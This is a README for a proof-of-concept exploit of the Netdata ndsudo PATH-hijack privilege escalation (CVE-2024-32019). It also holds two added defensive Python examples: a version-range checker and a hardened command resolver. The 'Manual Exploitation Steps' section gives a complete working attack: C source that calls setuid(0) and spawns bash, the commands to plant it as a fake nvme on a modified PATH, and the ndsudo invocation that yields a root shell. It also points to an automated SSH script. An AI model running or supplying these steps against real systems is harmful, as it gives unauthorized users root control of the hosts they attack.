
CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. The `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
CVE-2024-32019 is a high-severity local privilege escalation vulnerability in Netdata (versions >= 1.44.0-60 < 1.45.3), caused by insecure use of the PATH variable in the ndsudo SUID binary, allowing attackers to execute arbitrary commands as root.
Readme
# 🚨 CVE-2024-32019 - Netdata `ndsudo` PATH Vulnerability Exploit (LPE to Root)

A Python-based exploit for **CVE-2024-32019**, a high-severity Local Privilege Escalation vulnerability in the **Netdata Agent**, leveraging a misconfigured SUID binary (`ndsudo`) that fails to securely handle the `PATH` environment variable.

---

> [!Caution]
> This code is for **educational and authorized testing purposes only**. Unauthorized use of this tool against systems you do not own or have explicit permission to test is **illegal**.

## 🔍 Overview

**CVE ID**: CVE-2024-32019  
**CVSS Score**: 8.8 (High)  
**Disclosed**: April 12, 2024  
**Component**: Netdata Agent  
**Affected Versions**:

- `>= v1.45.0, < v1.45.3`
- `>= v1.44.0-60, < v1.45.0-169`
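The two ranges above mix a stable range and a nightly range, and Netdata version strings can carry a build number and a suffix (`v1.45.2-169-nightly`), so a plain string comparison gets this wrong. The following Python is an added example (not part of this repository) that parses those strings and triages a list of reported versions against the ranges exactly as the README lists them; the channel-splitting rule (stable versions are compared only with the stable range, nightlies only with the nightly range) is my assumption about how the two ranges are meant to be read. Feed it whatever version string your package manager or the agent's own version output reports.

```python
import re
from typing import List, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, nightly build); releases use 0

# Affected ranges exactly as the README above lists them: lower bound
# inclusive, upper bound exclusive. The first is the stable channel, the
# second the nightly channel (versions that carry a build number).
AFFECTED_RANGES: List[Tuple[str, str]] = [
    ("v1.45.0", "v1.45.3"),
    ("v1.44.0-60", "v1.45.0-169"),
]

_VERSION_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)(?:-(\d+))?(?:-[A-Za-z][\w.-]*)?$"
)


def parse_version(text: str) -> Version:
    """Parse 'v1.45.2', '1.44.0-60' or 'v1.45.2-169-nightly' into a tuple.

    Trailing words such as '-nightly' are accepted and ignored; anything else
    is rejected rather than silently compared as zero.
    """
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised Netdata version string: {text!r}")
    major, minor, patch, build = m.groups()
    return (int(major), int(minor), int(patch), int(build or 0))


def is_nightly(v: Version) -> bool:
    """A version with a non-zero build number is a nightly build."""
    return v[3] > 0


def is_affected(text: str) -> bool:
    """True if the version falls inside the affected range of its own channel.

    Stable and nightly builds are compared only against the range for their
    channel (an assumption); a plain tuple comparison would otherwise place
    nightly 1.45.0-169 (the README's nightly fix boundary) inside the stable
    1.45.0 <= v < 1.45.3 range and misreport it as affected.
    """
    v = parse_version(text)
    for low, high in AFFECTED_RANGES:
        lo, hi = parse_version(low), parse_version(high)
        if is_nightly(lo) != is_nightly(v):
            continue
        if lo <= v < hi:
            return True
    return False


def triage(versions: List[str]) -> List[Tuple[str, str]]:
    """Classify reported versions; unparseable entries are flagged for manual review."""
    out: List[Tuple[str, str]] = []
    for text in versions:
        try:
            out.append((text, "AFFECTED" if is_affected(text) else "not affected"))
        except ValueError:
            out.append((text, "unknown format"))
    return out


if __name__ == "__main__":
    # Constructed sample inventory, not taken from any real host.
    sample = ["v1.45.2", "v1.45.3", "v1.44.0-60-nightly",
              "v1.45.0-169-nightly", "v1.44.0", "1.45"]
    for name, verdict in triage(sample):
        print(f"{name:24} {verdict}")
```

The checker deliberately refuses to guess on malformed strings: a fleet scan that silently treated `1.45` as `1.45.0` would mark an unknown build as vulnerable or safe on no evidence.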

---

## 🧠 Technical Summary

Netdata’s `ndsudo` tool is a **SUID root binary** intended to securely execute a limited set of system commands (like `nvme`) on behalf of non-root users.

However, due to an implementation flaw, it **honors the user-controlled `PATH` variable** when resolving command binaries. If an attacker can manipulate the `PATH` to include a writeable directory containing a **malicious binary**, `ndsudo` will execute it with root privileges — resulting in a **local privilege escalation**.
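The defensive pattern the fix calls for, shown here as an added Python example (not Netdata's code; the fixed directory list and the ownership and permission checks are my assumptions about what a SUID helper should do, not the project's actual implementation): resolve the helper name only against absolute directories compiled into the program, ignore the caller's `PATH` entirely, and refuse any candidate that is world-writable or not owned by root. The vulnerable lookup is kept beside it for contrast, and the `demo()` scenario, with its throwaway directories and stub `nvme` script, is constructed.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, Optional, Sequence

# Directories a privileged helper may search. Fixed at build time, never
# taken from the environment. (Assumed list, not Netdata's actual one.)
TRUSTED_DIRS: Sequence[str] = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")


def resolve_untrusted(command: str, env: Dict[str, str]) -> Optional[str]:
    """The vulnerable pattern: search whatever PATH the caller supplied.

    A SUID helper that does this runs the first matching file, which the
    unprivileged caller can place anywhere PATH points.
    """
    return shutil.which(command, path=env.get("PATH", ""))


def resolve_trusted(command: str,
                    trusted_dirs: Sequence[str] = TRUSTED_DIRS,
                    owner_uid: int = 0) -> Optional[str]:
    """Hardened pattern: bare name only, fixed directories, strict file checks.

    Rejects path components in the command name, and skips candidates that
    are not regular files, are world-writable, are not owned by owner_uid
    (root by default), or lack the owner execute bit.
    """
    if command != os.path.basename(command) or command in ("", ".", ".."):
        raise ValueError(f"command must be a bare name, got {command!r}")
    for directory in trusted_dirs:
        candidate = os.path.join(directory, command)
        try:
            st = os.stat(candidate)
        except OSError:
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_mode & stat.S_IWOTH:
            continue  # world-writable: anyone could have replaced it
        if st.st_uid != owner_uid:
            continue
        if not st.st_mode & stat.S_IXUSR:
            continue
        return candidate
    return None


def demo() -> Dict[str, Optional[str]]:
    """Constructed scenario (not from the page): a writable directory first
    on PATH, plus a copy of the tool in a stand-in trusted directory."""
    with tempfile.TemporaryDirectory() as root:
        fakebin = os.path.join(root, "fakebin")
        trusted = os.path.join(root, "usr", "sbin")
        os.makedirs(fakebin)
        os.makedirs(trusted)
        for directory in (fakebin, trusted):
            path = os.path.join(directory, "nvme")
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho stub\n")  # harmless stub, not a real tool
            os.chmod(path, 0o755)
        env = {"PATH": os.pathsep.join([fakebin, trusted])}
        # Expect the running uid as owner so the demo works unprivileged.
        me = os.getuid()
        result: Dict[str, Optional[str]] = {
            "fakebin": fakebin,
            "trusted_dir": trusted,
            "untrusted_lookup": resolve_untrusted("nvme", env),
            "trusted_lookup": resolve_trusted("nvme", (trusted,), owner_uid=me),
        }
        # Even inside a trusted directory, a world-writable file is refused.
        os.chmod(os.path.join(trusted, "nvme"), 0o777)
        result["trusted_lookup_world_writable"] = resolve_trusted(
            "nvme", (trusted,), owner_uid=me)
        return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:30} {value}")
```

In `demo()` the untrusted lookup lands in the caller-controlled directory, while the trusted lookup ignores `PATH` and finds the copy in the fixed directory; the same trusted lookup returns nothing once that file becomes world-writable, which is the check an administrator would also want a helper to make when a trusted directory has been misconfigured.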

---

## 💥 Manual Exploitation Steps

The following steps demonstrate how to manually exploit the vulnerability in `ndsudo`.

### 1. Create a Privilege Escalation Binary

Save the following C code as `nvme.c`:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

### 3. Prepare the Exploit Environment on the Target

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
```

### 5. Trigger the Exploit

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

If successful, you'll get a root shell.

```bash
# whoami
root
```

## Automatic Exploitation

If you have SSH access to the target, you can use `CVE-2024-32019-dbs.py` to automate these steps.

![Exploitation using script](images/image.png)

## 📎 References

- [GitHub Security Advisory](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
- [CVSS Score: 8.8 (High)](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
- [CVE-2024-32019: Netdata vulnerability analysis and mitigation](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)